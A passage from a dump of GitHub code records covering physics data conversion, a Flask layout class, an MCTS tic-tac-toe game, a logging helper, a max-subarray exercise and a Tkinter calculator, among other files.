\"T_ITSModuleOuter\",\n ]\n\n evColumns = [\n \"RunNum\",\n \"PeriodNumber\",\n \"OrbitNumber\",\n \"BunchCrossNumber\",\n \"Mass\",\n \"Pt\",\n \"Q\",\n \"Rapidity\",\n \"Phi\",\n \"ZNAenergy\",\n \"ZNCenergy\",\n \"ZPAenergy\",\n \"ZPCenergy\",\n \"VtxX\",\n \"VtxY\",\n \"VtxZ\",\n \"VtxContrib\",\n \"VtxChi2\",\n \"VtxNDF\",\n \"SpdVtxX\",\n \"SpdVtxY\",\n \"SpdVtxZ\",\n \"SpdVtxContrib\",\n \"V0Adecision\",\n \"V0Cdecision\",\n \"ADAdecision\",\n \"ADCdecision\",\n \"V0Afired\",\n \"V0Cfired\",\n \"ADAfired\",\n \"ADCfired\",\n \"STPfired\",\n \"SMBfired\",\n \"SM2fired\",\n \"SH1fired\",\n \"OM2fired\",\n \"OMUfired\",\n \"IsTriggered\",\n \"nTracklets\",\n \"nTracks\",\n \"ZDCAtime_0\",\n \"ZDCAtime_1\",\n \"ZDCAtime_2\",\n \"ZDCAtime_3\",\n \"ZDCCtime_0\",\n \"ZDCCtime_1\",\n \"ZDCCtime_2\",\n \"ZDCCtime_3\",\n ]\n\n events = uproot4.open(\n ccup9_2015_file,\n object_cache=5000,\n num_workers=12,\n interpretation_executor=executor,\n )[tree_name]\n\n data_tracks = events.arrays(\n filter_name=branches, library=\"pd\", array_cache=5000\n ) # , entry_stop=1000000)\n data_tracks.to_parquet(\n r\"D:\\GoogleDrive\\Job\\cern\\Alice\\analysis\\data\\RhoPrime\\2015\\4Prongs2015oTracks.parquet\"\n )\n data_events = events.arrays(filter_name=evColumns, library=\"pd\")\n chips = events.arrays(filter_name=[\"FORChip\"], library=\"pd\")\n chips = chips.groupby(\"entry\").FORChip.apply(list)\n data_events[\"FORChip\"] = chips\n data_events.to_parquet(\n r\"D:\\GoogleDrive\\Job\\cern\\Alice\\analysis\\data\\RhoPrime\\2015\\4Prongs2015oEvents.parquet\"\n )\n\n\nif __name__ == \"__main__\":\n convert_root_file_to_parquet(\"\", \"\", \"\", \"\")\n","repo_name":"bdrum/cern-physics","sub_path":"notebooks/FourTracks/data/format/convert_to_parquet.py","file_name":"convert_to_parquet.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"30317775955","text":"from network.network import (get_number_of_activated_antenna,\n can_antenna_be_turned_on,\n turn_off_antenna,\n turn_on_antenna)\n\ndef _flip_coin(random):\n return random.random() < 0.5\n\ndef create_new_network(network, box_size, random):\n number_of_square = box_size * box_size\n for antenna in range(number_of_square):\n if can_antenna_be_turned_on(antenna, network, box_size) and _flip_coin(random):\n network = turn_on_antenna(antenna, network)\n else:\n network = turn_off_antenna(antenna, network)\n return network\n\n\ndef get_pseudo_random_networks(box_size, random):\n network = 0\n while True:\n network = create_new_network(network, box_size, random)\n yield network\n\ndef get_random_networks(box_size, random):\n time_between_sample = 20\n for i, network in enumerate(get_pseudo_random_networks(box_size, random), 1):\n if i % time_between_sample == 0:\n yield network\n\n\ndef estimate_number_of_activated_antenna(n, box_size, random):\n estimate = 0\n for _, network in zip(range(n), get_random_networks(box_size, random)):\n estimate += get_number_of_activated_antenna(network)\n return estimate / n\n","repo_name":"didiercrunch/simulationexam","sub_path":"network/gibbs.py","file_name":"gibbs.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34501788451","text":"from hashlib import md5\nfrom flask import render_template\n\nclass Layout:\n\n templates = [\n 'tab',\n 'column', # can settings column size\n 'modal',\n 'blank'\n ]\n\n template = 'blank'\n #\n # def __repr__(self):\n # return 'template: {}'.format(self.template)\n\n def __init__(self, template, layout, name = None):\n self.layouts = layout\n self.template = template\n self.asyncButtons = []\n self.modal = None\n self.modalLayouts = []\n self.templateSlug = None\n\n @classmethod\n def addLayout(cls, template, layout):\n if not isinstance(layout, list):\n layout = [layout]\n return cls(template, layout)\n\n def render(self, layouts, **kwargs):\n return render_template('layouts/{}.html'.format(self.template),\n forms = layouts,\n asyncButtons = self.asyncButtons,\n modal = self.modal,\n templateSlug = self.templateSlug,\n layout = self)\n\n def addAsyncButton(self, button):\n self.asyncButtons.append(button)\n return self\n\n def setModal(self, modal):\n self.modal = modal\n self.templateSlug = md5(modal.encode('utf-8')).hexdigest()\n return self\n\n def build(self, query, asyncLoad = False):\n if asyncLoad:\n self.template = 'blank'\n layouts = self.buildView(query, self.layouts)\n return self.render(layouts)\n\n def buildView(self, query, layouts):\n _layouts = []\n\n for layout in layouts:\n if isinstance(layout, Layout):\n if layout.template == 'modals':\n self.modalLayouts.append(layout)\n _layouts.append(layout.build(query))\n continue\n if callable(layout):\n layout = layout()\n layout.setRepository(query)\n _layouts.append(layout)\n\n return _layouts\n\n def getModals(self):\n return self.modalLayouts\n\n def filter(self, name):\n _layout = None\n for layout in self.layouts:\n if isinstance(layout, Layout):\n _layout = layout.filter(name)\n continue\n if layout.name == name:\n _layout = layout\n break\n return _layout\n\n\n def buildOrPrint(self, data):\n if isinstance(data, str):\n return data\n else:\n return data.build()\n","repo_name":"algha/tarim","sub_path":"tarim/app/modules/admin/core/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"68"} +{"seq_id":"18443669287","text":"\"\"\"\r\n Title: The end_value objective function\r\n Description: The objective function for calculating the x end point\r\n Author: Janzen Choi\r\n\r\n\"\"\"\r\n\r\n# Libraries\r\nfrom moga_neml.errors.__error__ import __Error__\r\n\r\n# The X End class\r\nclass Error(__Error__):\r\n \r\n def initialise(self, factor:float=10):\r\n \"\"\"\r\n Runs at the start, once\r\n\r\n Parameters:\r\n * `factor`: The factor to penalise for unconservative predictions\r\n \"\"\"\r\n x_list = self.get_x_data()\r\n self.factor = factor\r\n self.exp_x_end = x_list[-1]\r\n\r\n def get_value(self, prd_data:dict) -> float:\r\n \"\"\"\r\n Computing the NRMSE\r\n\r\n Parameters:\r\n * `prd_data`: The predicted data\r\n\r\n Returns the error\r\n \"\"\"\r\n x_label = self.get_x_label()\r\n prd_end_value = prd_data[x_label][-1]\r\n error = abs((prd_end_value - self.exp_x_end) / self.exp_x_end)\r\n if self.exp_x_end < prd_end_value:\r\n return error * self.factor\r\n return error","repo_name":"ACME-MG/calibrate","sub_path":"moga_neml/errors/end_cons.py","file_name":"end_cons.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29873145856","text":"\r\nfrom threading import RLock\r\n\r\nimport settings\r\nimport managers\r\n\r\nfrom logs import log\r\nfrom utils.properties import lazy, weak, constant, roproperty, rwproperty\r\nfrom utils import verificators\r\n\r\nfrom ..constants import NON_CONTAINER, CONTAINER, TOP_CONTAINER, RENDER_CONTEXT\r\nfrom ..generic import MemoryBase\r\nfrom ..empties import ChangeEmptyError, EmptySet\r\n\r\nfrom .attributes import MemoryAttributesSketch\r\nfrom .actions import MemoryActions\r\nfrom .events import MemoryEvents\r\nfrom .bindings import MemoryBindings\r\nfrom .structure import MemoryStructureSketch, MemoryStructure\r\n\r\n\r\n@weak(\"_collection\", \"_parent\", \"_application\")\r\nclass MemoryObjectSketch(MemoryBase):\r\n\r\n is_object = constant(True)\r\n\r\n is_non_container = property(lambda self: self._type.container == NON_CONTAINER)\r\n is_container = property(lambda self: CONTAINER <= self._type.container <= TOP_CONTAINER)\r\n is_top_container = property(lambda self: self._type.container == TOP_CONTAINER)\r\n\r\n _restore = False\r\n\r\n generic = RENDER_CONTEXT,\r\n\r\n @lazy\r\n def _primary(self):\r\n if self._virtual:\r\n result = self\r\n while result._parent and result._parent.virtual:\r\n result = result._parent\r\n return result\r\n else:\r\n return self._application\r\n\r\n @lazy\r\n def _bindings(self):\r\n return MemoryBindings(self)\r\n\r\n @lazy\r\n def _structure(self):\r\n return None if self._parent or self._virtual else MemoryStructureSketch(self)\r\n\r\n _order = None\r\n _id = None\r\n _name = None\r\n _original_name = None\r\n\r\n _dependents = EmptySet()\r\n\r\n def __init__(self, collection, type, application, parent, virtual=False, attributes=None):\r\n self._collection = collection\r\n self._virtual = virtual\r\n self._application = application\r\n self._parent = parent\r\n\r\n # initialize lock\r\n if parent:\r\n if virtual == parent.virtual:\r\n self._lock = parent.lock\r\n else:\r\n self._lock = RLock()\r\n else:\r\n self._lock = application.lock\r\n\r\n # generic characteristics\r\n self._type = type\r\n\r\n # collections\r\n self._attributes = MemoryAttributesSketch(self, values=attributes)\r\n self._objects = MemoryObjects(self)\r\n self._events = MemoryEvents(self)\r\n self._actions = MemoryActions(self)\r\n\r\n # internal\r\n self._classes = {}\r\n\r\n # lock = property(lambda self: self._application.lock)\r\n lock = roproperty(\"_lock\")\r\n order = rwproperty(\"_order\")\r\n is_virtual = virtual = roproperty(\"_virtual\")\r\n application = rwproperty(\"_application\")\r\n container = property(lambda self: self._parent.container if self._parent else self)\r\n parent = rwproperty(\"_parent\")\r\n primary = roproperty(\"_primary\")\r\n\r\n type = rwproperty(\"_type\")\r\n id = rwproperty(\"_id\")\r\n name = rwproperty(\"_name\")\r\n original_name = roproperty(\"_original_name\")\r\n\r\n attributes = roproperty(\"_attributes\")\r\n objects = roproperty(\"_objects\")\r\n events = roproperty(\"_events\")\r\n actions = roproperty(\"_actions\")\r\n bindings = roproperty(\"_bindings\")\r\n\r\n structure = roproperty(\"_structure\")\r\n\r\n stateful = property(lambda self: int(self._attributes.get(\"stateful\", 0)))\r\n hierarchy = property(lambda self: int(self._attributes.get(\"hierarchy\", 0)))\r\n\r\n def select(self, name, *names):\r\n if self._name == name:\r\n return self._objects.select(*names)\r\n else:\r\n return None\r\n\r\n def select_original(self, name, *names):\r\n if self._original_name or self._name == name:\r\n return self._objects.select(*names)\r\n else:\r\n return None\r\n\r\n def __invert__(self):\r\n ~self._attributes\r\n if self.__dict__.get(\"_structure\") is not None:\r\n ~self._structure\r\n\r\n restore = self._restore\r\n self.__class__ = MemoryObject\r\n self._collection.on_complete(self, restore)\r\n if not restore:\r\n managers.dispatcher.dispatch_handler(self, \"on_create\")\r\n if self._parent and self._virtual == self._parent.virtual:\r\n self._parent.invalidate(upward=True)\r\n self.autosave()\r\n return self\r\n\r\n def __str__(self):\r\n return \" \".join(filter(None, (\r\n \"virtual\" if getattr(self, \"_virtual\", None) else None,\r\n \"object\",\r\n \":\".join(filter(None, (getattr(self, \"_id\", None), getattr(self, \"_name\", None)))),\r\n \"sketch\")))\r\n\r\n\r\nclass MemoryObjectRestorationSketch(MemoryObjectSketch):\r\n\r\n _restore = True\r\n\r\n\r\nclass MemoryObjectDuplicationSketch(MemoryObjectSketch):\r\n\r\n def __init__(self, collection, application, parent, another):\r\n super(MemoryObjectDuplicationSketch, self).__init__(collection,\r\n another.type, application, parent,\r\n virtual=parent.virtual if parent else False,\r\n attributes=another.attributes)\r\n\r\n\r\nclass MemoryObjectGhost(MemoryBase):\r\n\r\n def __str__(self):\r\n return \" \".join(filter(None, (\r\n \"obsolete\",\r\n \"virtual\" if self._virtual else None,\r\n \"object\",\r\n \":\".join(filter(None, (self._id, self._name))))))\r\n\r\n\r\nclass MemoryObject(MemoryObjectSketch):\r\n\r\n @lazy\r\n def _structure(self):\r\n return None if self._parent or self._virtual else MemoryStructure(self)\r\n\r\n def __init__(self):\r\n raise Exception(u\"Use 'new' to create new object\")\r\n\r\n def _set_name(self, value):\r\n if self._name == value:\r\n return\r\n\r\n if not verificators.name(value):\r\n raise Exception(\"Invalid name: %r\" % value)\r\n\r\n with self.lock:\r\n self._collection.on_rename(self, value)\r\n managers.dispatcher.dispatch_handler(self, \"on_rename\", value)\r\n self._name = value\r\n self.invalidate(upward=True)\r\n self.autosave()\r\n\r\n type = roproperty(\"_type\")\r\n id = roproperty(\"_id\")\r\n name = rwproperty(\"_name\", _set_name)\r\n\r\n # unsafe\r\n def compose(self, ident=u\"\", file=None, shorter=False, excess=False):\r\n information = u\"ID=\\\"%s\\\" Name=\\\"%s\\\" Type=\\\"%s\\\"\" % (self._id, self._name.encode(\"xml\"), self._type.id)\r\n if self._attributes or self._objects or self._actions:\r\n file.write(u\"%s\\n\" % (ident, information))\r\n self._attributes.compose(ident=ident + u\"\\t\", file=file, shorter=shorter, excess=excess)\r\n self._objects.compose(ident=ident + u\"\\t\", file=file, shorter=shorter, excess=excess)\r\n self._actions.compose(ident=ident + u\"\\t\", file=file)\r\n file.write(u\"%s\\n\" % ident)\r\n else:\r\n file.write(u\"%s\\n\" % (ident, information))\r\n\r\n def autosave(self):\r\n if not self._virtual:\r\n self._application.autosave()\r\n\r\n def invalidate(self, contexts=None, downward=False, upward=False):\r\n with self.lock:\r\n # cleanup compiled classes\r\n if \"_classes\" in self.__dict__:\r\n if contexts:\r\n if isinstance(contexts, basestring):\r\n if settings.DETAILED_LOGGING:\r\n log.write(\"Invalidate %s in %s context\" % (self, contexts))\r\n self._classes.pop(contexts, None)\r\n else:\r\n if settings.DETAILED_LOGGING:\r\n log.write(\"Invalidate %s in %s contexts\" % (self, \", \".join(contexts)))\r\n for context in contexts:\r\n self._classes.pop(context, None)\r\n else:\r\n if settings.DETAILED_LOGGING:\r\n log.write(\"Invalidate %s\" % self)\r\n self._classes = {}\r\n\r\n # NOTE: this can delete compiled e2vdom scripts\r\n # TODO: check necessity of resource invalidation\r\n # possible this must be done on object delete\r\n # NOTE: cleanup=False to avoid excessive file operations\r\n\r\n # cleanup resources\r\n managers.resource_manager.invalidate_resources(self._id, cleanup=False)\r\n\r\n # perform downward invalidation\r\n if downward:\r\n for child in self._objects.itervalues():\r\n child.invalidate(contexts=contexts, downward=True)\r\n\r\n # perform upward invalidation\r\n if upward:\r\n # NOTE: this can cause issues in case when\r\n # virtual objects will be stored between render\r\n # it may be worth adding a special attribute\r\n # that break invalidate chain for dynamic objects\r\n\r\n # validate only same (non-)virtual objects in chain\r\n if self._parent and self._virtual == self._parent.virtual:\r\n self._parent.invalidate(contexts=contexts, upward=True)\r\n for dependent in self._dependents:\r\n if settings.DETAILED_LOGGING:\r\n log.write(\"Invalidate %s dependent %s\" % (self, dependent))\r\n dependent.invalidate(contexts=contexts, upward=True)\r\n\r\n # update factory counter to indicate a change\r\n if self._factory_calls:\r\n self._factory_invalidates += 1\r\n\r\n def attach(self, object):\r\n with self.lock:\r\n try:\r\n self._dependents.add(object)\r\n except ChangeEmptyError:\r\n self._dependents = {object}\r\n\r\n def detach(self, object):\r\n with self.lock:\r\n self._dependents.remove(object)\r\n\r\n _factory_calls = 0\r\n _factory_invalidates = 0\r\n\r\n def factory(self, context, dynamic=None, mapping=None, probe=False):\r\n # we are busy\r\n managers.memory._operations += 1\r\n\r\n # check if already exists\r\n if dynamic is None:\r\n try:\r\n klass = self._classes[context]\r\n except KeyError:\r\n if probe:\r\n return None\r\n else:\r\n if dynamic <= klass._dynamic:\r\n return klass\r\n\r\n # remember invalidate count\r\n with self.lock:\r\n self._factory_calls += 1\r\n invalidates = self._factory_invalidates\r\n\r\n # start main loop\r\n while 1:\r\n try:\r\n new_klass = managers.compiler.compile(self, context, dynamic=dynamic, mapping=mapping)\r\n except BaseException:\r\n # just decrease calls counter on error\r\n with self.lock:\r\n self._factory_calls -= 1\r\n raise\r\n else:\r\n # on successfull compilation...\r\n with self.lock:\r\n if invalidates == self._factory_invalidates:\r\n # if has no changes\r\n if self._factory_calls > 1:\r\n # decrease calls counter\r\n self._factory_calls -= 1\r\n else:\r\n # or remove to free memory if no other calls\r\n del self._factory_calls\r\n self.__dict__.pop(\"_factory_invalidates\", None)\r\n\r\n # update klass if needed and return\r\n klass = self._classes.get(context)\r\n if klass is None or dynamic > klass._dynamic:\r\n self._classes[context] = klass = new_klass\r\n return klass\r\n else:\r\n # or just update stored value\r\n invalidates = self._factory_invalidates\r\n\r\n def __invert__(self):\r\n raise NotImplementedError\r\n\r\n def __str__(self):\r\n return \" \".join(filter(None, (\r\n \"virtual\" if self._virtual else None,\r\n \"object\",\r\n \":\".join(filter(None, (self._id, self._name))))))\r\n\r\n\r\nfrom .objects import MemoryObjects\r\n","repo_name":"VDOMBoxGroup/runtime2.0","sub_path":"sources/memory/application/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":12137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29907480891","text":"from util import node\nfrom MCTS import MCTS\n\nmcts = MCTS()\n\ndef ai_play(board,ai_player):\n\troot = node(board,None,ai_player)\n\t# print(root.board_state)\n\tedge = mcts.monte_carlo_tree_search(root,0.5)\n\t# print(root.board_state)\n\tmcts.make_move(edge.move, ai_player, root.board_state)\n\treturn root.board_state\n\ndef printBoard(board):\n\tfor i in range(1,10):\n\t\tif i%3 ==0:\n\t\t\tif board[i-1] == -1:\n\t\t\t\tprint(\" \")\n\t\t\telif board[i-1] == 1:\n\t\t\t\tprint(\"X\")\n\t\t\telif board[i-1] == 0:\n\t\t\t\tprint(\"0\")\n\t\telse:\n\t\t\tif board[i-1] == -1:\n\t\t\t\tprint(\" \",end=\"|\")\n\t\t\telif board[i-1] == 1:\n\t\t\t\tprint(\"X\",end=\"|\")\n\t\t\telif board[i-1] == 0:\n\t\t\t\tprint(\"O\",end=\"|\")\n\n\nletter_map = {'X' : 1, 'O' : 0}\ntictacBoard = [-1, -1, -1, -1, -1, -1, -1, -1, -1]\nai_player = 'X' \nuser = 'O'\n\nprintBoard(tictacBoard)\nwhile True:\n\tplayer_input = int(input(\"Input Position: \"))\n\ttictacBoard[player_input-1] = letter_map[user]\n\tprintBoard(tictacBoard)\n\twin = mcts.check_win(tictacBoard)\n\tif win == 2:\n\t\tprint(\"its a draw\")\n\t\tbreak\n\telif win == 1:\n\t\tprint(\"X Won!!!\")\n\t\tbreak\n\telif win == 0:\n\t\tprint(\"O Won!!!\")\n\t\tbreak\n\t\n\ttictacBoard = ai_play(tictacBoard, letter_map[ai_player])\n\tprintBoard(tictacBoard)\n\twin = mcts.check_win(tictacBoard)\n\tif win == 2:\n\t\tprint(\"its a draw\")\n\t\tbreak\n\telif win == 1:\n\t\tprint(\"X Won!!!\")\n\t\tbreak\n\telif win == 0:\n\t\tprint(\"O Won!!!\")\n\t\tbreak","repo_name":"Abdullah10111993/MCTS","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24896737192","text":"import os\nimport sys\nimport logging\nimport logging.handlers\n\nfrom de.utils.common import AppInfo\nfrom logging import INFO, WARNING, ERROR, DEBUG\n\n\n# log level 추가시 선언\n# DEBUG -> 10, DETAIL -> 18, MORE -> 19, INFO -> 20, WARNING -> 30\nMORE = 19\nDETAIL = 18\n\n# logger\nget_logger = logging.getLogger\napp_name = AppInfo().app_name() # 현재 실행되는 모듈의 app_name 추출\n\n# log level 추가\nlogging.addLevelName(MORE, \"MORE\")\nlogging.addLevelName(DETAIL, \"DETAIL\")\n\n# log 출력 메소드 추가\nlogging.Logger.more = lambda inst, msg, *args, **kwargs: inst.log(MORE,\n f\"[{get_caller()}] {msg}\",\n *args,\n **kwargs)\nlogging.Logger.detail = lambda inst, msg, *args, **kwargs: inst.log(DETAIL,\n f\"[{get_caller(2)}>{get_caller()}] {msg}\",\n *args,\n **kwargs)\nlogging.Logger.logs = lambda inst, level, msg, *args, **kwargs: inst.log(level,\n f\"[{get_caller(1, False)}] {msg}\",\n *args,\n **kwargs)\nlogging.Logger.logc = lambda inst, level, msg, *args, **kwargs: inst.log(level,\n f\"[{get_caller()}] {msg}\",\n *args,\n **kwargs)\nlogging.Logger.logcc = lambda inst, level, msg, *args, **kwargs: inst.log(level,\n f\"[{get_caller(2)}>{get_caller()}] {msg}\",\n *args,\n **kwargs)\n\n\ndef get_caller(step=1, fullname=True):\n \"\"\"\n A function that returns the caller(function) of the code at the executed location.\n :param step:\n caller depth.\n :param fullname:\n True if you want to return the full_path_name\n containing the caller(function) path, False otherwise\n :return:\n \"\"\"\n step += 1\n caller = sys._getframe(step).f_locals.get('self')\n if isinstance(caller, type(None)):\n return sys._getframe(step).f_code.co_name\n elif fullname:\n return str(sys._getframe(step).f_locals.get('self')).split(\" \")[0][1:] + \".\" + \\\n sys._getframe(step).f_code.co_name\n else:\n return sys._getframe(step).f_code_co_name\n\n\ndef caller_id():\n \"\"\"\n return caller class id\n \"\"\"\n return id(sys._getframe(2).f_locals.get('self'))\n\n\ndef set_logging_level(logger_name=None, logging_level=None):\n \"\"\"\n set or change logging level\n \"\"\"\n if logging_level:\n if isinstance(logging_level, str):\n logging_level = logging_level.upper()\n c_logger = logging.getLogger(logger_name)\n c_logger.setLevel(logging_level)\n\n\n_stream_handler_enabled = [] # logger 의 스트림 여부\n_file_handlers = [] # logger 의 파일 로깅 여부\n_default_format = '%(asctime)s %(levelname)s %(message)s'\n\n\ndef create_logger(log_file, logger_name=None, err_logfile=True, max_bytes=104857600,\n back_up_count=3, propagate=True, format=_default_format, stream_enabled=True):\n \"\"\"\n logger 생성.\n default (log file size 100MB, log format --> 'YYYY-MM-DD hh:mm:ss:ms loglevel message'\n :param log_file:\n :param logger_name: 생성할 logger name\n :param err_logfile: err log file 에 logging 여부\n :param max_bytes: default 100MB\n :param back_up_count: rotateFileHandler 최대 backup file 개수\n :param propagate: 상위 logger 전파 여부\n :param format: logging default format 상단 참조\n :param stream_enabled:\n :return:\n \"\"\"\n global _stream_handler_enabled\n global _file_handlers\n\n clogger = logging.getLogger(logger_name)\n clogger.setLevel(INFO)\n clogger.propagate = propagate # 상위 logger 전파 여부\n formatter = logging.Formatter(format)\n\n # 핸들러 중복 선언 방지\n # ** stream_handler --> console 에 메세지를 전달\n if stream_enabled and logger_name not in _stream_handler_enabled:\n _stream_handler_enabled.append(logger_name)\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(formatter)\n clogger.addHandler(stream_handler)\n\n # log 경로 생성\n\n # os.path.dirname --> 경로 중 directory 명만 얻기\n log_dir = os.path.dirname(log_file)\n if log_dir and not os.path.exists(log_dir):\n os.makedirs(log_dir, exist_ok=True) # exist_ok --> 해당 디렉토리가 있으면 무시\n\n # ** file_handler --> file 에 메세지를 전달\n # RotatingFileHandler -> 필요한 갯수 만큼 백업 file 을 생성하여 관리\n # .log / .err file 을 생성.\n # - .log --> 사용자가 app_properties.yml 에서 설정한 logger level 에 따라 logger level 이 설정\n if log_file not in _file_handlers:\n _file_handlers.append(log_file)\n file_handler = logging.handlers.RotatingFileHandler(log_file,\n maxBytes=max_bytes,\n backupCount=back_up_count)\n file_handler.setFormatter(formatter)\n clogger.addHandler(file_handler)\n\n # .err -> log 중 ERROR 라고 지정한 것들만 따로 저장하기 위하여 .err file 지정\n if err_logfile:\n err_file_handler = logging.handlers.RotatingFileHandler(log_file.replace(\".log\", \".err\"),\n maxBytes=max_bytes,\n backupCount=back_up_count)\n err_file_handler.setFormatter(formatter)\n err_file_handler.setLevel(ERROR)\n clogger.addHandler(err_file_handler)\n\n return clogger\n","repo_name":"instork/airflow-api2db-exercise","sub_path":"dags/de/utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":6395,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"14917525895","text":"#!/usr/bin/python\n\nimport os, sys, mmap\nfrom regression import Regression\n\nloader = '../src/pal'\n\nregression = Regression(loader, \"Thread\")\n\nregression.add_check(name=\"Thread Creation\",\n check=lambda res: \"Child Thread Created\" in res[0].log and\n \"Run in Child Thread: Hello World\" in res[0].log)\n\nregression.add_check(name=\"Multiple Threads Run in Parallel\",\n check=lambda res: \"Threads Run in Parallel OK\" in res[0].log)\n\nregression.add_check(name=\"Set Thread Private Segment Register\",\n check=lambda res: \"Private Message (FS Segment) 1: Hello World 1\" in res[0].log and\n \"Private Message (FS Segment) 2: Hello World 2\" in res[0].log)\n\nregression.add_check(name=\"Thread Exit\",\n check=lambda res: \"Child Thread Exited\" in res[0].log)\n\nregression.run_checks()\n","repo_name":"jovanbulck/sgx-pte","sub_path":"Pal/regression/02_Thread.py","file_name":"02_Thread.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"68"} +{"seq_id":"31515901951","text":"# Given an array of numbers, find the maximum sum of any contiguous subarray of the array\n\n# Example Input [34, -50, 42, 14, -5, 86]\n# Output 137\n# 42 + 14 - 5 + 86 = 137\n\n# brute force and no wrapping around is allowed\n# O(N^3) time complexity due to the double-lay for loops, the sum function takes another O(N) time\n# O(1) time complexity\ndef max_subarray_sum_1(nums):\n max_sum = 0\n for i in range(len(nums)):\n for j in range(i,len(nums)):\n #print(nums[i:j+1], sum(nums[i:j+1]))\n max_sum = sum(nums[i:j+1]) if max_sum < sum(nums[i:j+1]) else max_sum\n\n return max_sum\n\n# O(N) time, just iterate through the array onece\n# like a dp approach\n# two variables, max_so_far stores the global max, max_ending_here stores the contiguous sum till the current element\n# Kadane’s algorithm\ndef max_subarray_sum_2(nums):\n max_so_far = 0\n max_ending_here = 0\n \n for i in range(len(nums)):\n max_ending_here = max_ending_here + nums[i]\n max_ending_here = 0 if max_ending_here < 0 else max_ending_here\n\n max_so_far = max_ending_here if max_ending_here > max_so_far else max_so_far\n \n return max_so_far\n\n# When wrapping is allowed\n\n# Example Input [8, -1, 3, 4]\n# Output 15\n# 3 + 4 + 8 = 15\n\n# wrapping of contributing elements impleies non wrapping of non contributing elements.\n# to maximize sum of wrapping circular array, we need to find the non-wrapping/contiguous subarray with the mininmum sum (or most negative)\n# 3-pass, first pass computes maximum subarray sum, second pass reverse the sign of the input array, third pass computes smallest subarray sum by calling the same function with the reversed sign input array\n# as after reversing the sign, finding the max subarray is equivalent as finding the min continous subarray\n# then reverse back the sign of max subarray of the reversed input array and add to total sum of input array, this gives the largest sum of wrapping circular array\n# compare non-wrapping max and wrapping max\n\ndef max_subarray_sum_3(nums):\n\n def max_subarray_sum_2(nums):\n max_so_far = 0\n max_ending_here = 0\n \n for i in range(len(nums)):\n max_ending_here = max_ending_here + nums[i]\n max_ending_here = 0 if max_ending_here < 0 else max_ending_here\n\n max_so_far = max_ending_here if max_ending_here > max_so_far else max_so_far\n \n return max_so_far\n\n reverse_nums = [-x for x in nums]\n\n print(max_subarray_sum_2(nums), max_subarray_sum_2(reverse_nums), sum(nums))\n return max(max_subarray_sum_2(nums), sum(nums) + max_subarray_sum_2(reverse_nums))\n\n\n# solution from the book, max_subarray_sum and min_subarray_sum are essentially the same algo\n# can be implemented as above\ndef maximum_circular_subarray(nums):\n max_subarray_sum_wraparound = sum(nums) - min_subarray_sum(nums)\n\n return max(max_subarray_sum(nums), max_subarray_sum_wraparound)\n\ndef max_subarray_sum(nums):\n max_ending_here, max_so_far = 0, 0\n\n for x in nums:\n max_ending_here = max(x, max_ending_here + x)\n max_so_far = max(max_so_far, max_ending_here)\n\n return max_so_far\n\ndef min_subarray_sum(nums):\n min_ending_here, min_so_far = 0, 0 \n\n for x in nums:\n min_ending_here = min(x, min_ending_here+x)\n min_so_far = min(min_so_far, min_ending_here)\n\n return min_so_far\n","repo_name":"mxu007/daily_coding_problem_practice","sub_path":"DCP_1_3.py","file_name":"DCP_1_3.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2735150668","text":"import numpy as np\nimport os\nfrom scipy.ndimage import zoom\n\nroot = r\"Data\\Out\"\n\nfor item in os.listdir(root):\n\n if item not in os.listdir(r'Data/Out_NN'):\n print(item)\n array = np.load(os.path.join(root, item))\n reshaped = zoom(array, (1, 0.5, 0.5))\n np.save(os.path.join(r\"Data\\Out_NN\", item), reshaped)\n ","repo_name":"siddharthbharthulwar/Synthetic-X-Ray","sub_path":"resizect.py","file_name":"resizect.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"74795242777","text":"#!/usr/bin/env python3\n#Title: Calculator\n#Author: MYTH\n\nimport tkinter as tk\nimport time\nfrom tkinter import * \n\ndef delete():\n mistake = input.get()[:-1]\n input.set(mistake)\n \ndef clear():\n error = input.get()\n input.set(\"\")\n\ndef text_insert(text):\n current = input.get()\n input.set(current + str(text))\n \ndef evaluate():\n eqn = input.get()\n try:\n result = str(eval(eqn))\n time.sleep(0.3)\n input.set(result)\n except SyntaxError:\n time.sleep(1.0)\n input.set(\"SyntaxERROR\")\n\ncal = tk.Tk()\ncal.title(\"Calculator\")\ncal.geometry(\"400x400\")\ncal.resizable(False, False)\n\ninput = StringVar()\n\ntitle = tk.Label(cal, text=\"Calculator\", font=(\"Times New Roman\", 10, \"bold\"), background=\"black\", fg=\"white\")\ntitle.place(x=150)\n\ndisplay = tk.Entry(cal, bd=5, textvariable= input, justify=RIGHT, width=20, font=(\"Times New Roman\", 10)).place(x=30, y=50)\n\nseven = tk.Button(cal, text=\"7\", command = lambda:text_insert(7), bd=2, bg=\"gray\").place(y=120)\n\neight = tk.Button(cal, text=\"8\", command = lambda:text_insert(8), bd=2, bg=\"gray\").place(x=100, y=120)\n\nnine = tk.Button(cal, text=\"9\", command = lambda:text_insert(9), bd=2, bg=\"gray\").place(x=200, y=120)\n\ndelete = tk.Button(cal, text=\"Del\", command=delete, width=1, height=1, bd=2, bg=\"yellow\", fg=\"red\", activebackground=\"red\", 